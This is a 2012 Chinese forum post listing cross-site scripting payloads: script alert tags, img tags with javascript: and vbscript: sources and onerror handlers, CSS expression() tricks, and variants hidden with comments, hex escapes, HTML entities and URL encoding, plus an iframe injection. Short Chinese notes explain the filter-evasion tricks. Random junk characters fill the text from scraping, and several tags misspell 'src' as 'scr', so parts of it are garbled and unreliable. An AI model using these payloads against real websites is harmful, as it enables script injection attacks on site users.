<script>alert("跨站")</script> (最常用)
1 b$ k' i* L' s( [8 h<img scr=javascript:alert("跨站")></img> V( s, k6 q# `# X- ^* `
<img scr="javascript: alert(/跨站/)></img>( N0 F8 s: I; z9 A4 e2 X1 q# P- v
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
0 q& e: U! ?, N1 E8 u<img scr="#" onerror=alert(/跨站/)></img> Y" o! x7 e# u {& |6 ?4 u
<img scr="#" style="xss:expression(alert(/xss/));"></img>: ` ]9 { C# k4 f f
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)5 \" O' a( e6 M5 k* x9 ]4 P% {; j
<img src=vbscript:msgbox ("xss")></img>0 D6 Q' ~8 Y" f$ V) k% p9 }
<style> input {left:expression (alert('xss'))}</style>
8 G5 O- r: l4 L+ q' |9 `" P<div style={left:expression (alert('xss'))}></div>- _2 \( ?& Q3 x' }
<div style={left:exp/* */ression (alert('xss'))}></div>
" v' u2 ^9 _- ?5 G2 s<div style={left:\0065\0078ression (alert('xss'))}></div>" z) D# E% D c
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>. N; a7 q# C9 U) G/ Z6 h
unicode <div style="{left:expRessioN (alert('xss'))}">' J: m9 J% s) \* f% E
' a' o$ ^* U; a2 Z) ~
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
. h9 V/ p( X5 m+ R& r2 {7 B |
发表于 2012-9-15 14:09:13
收藏
支持
反对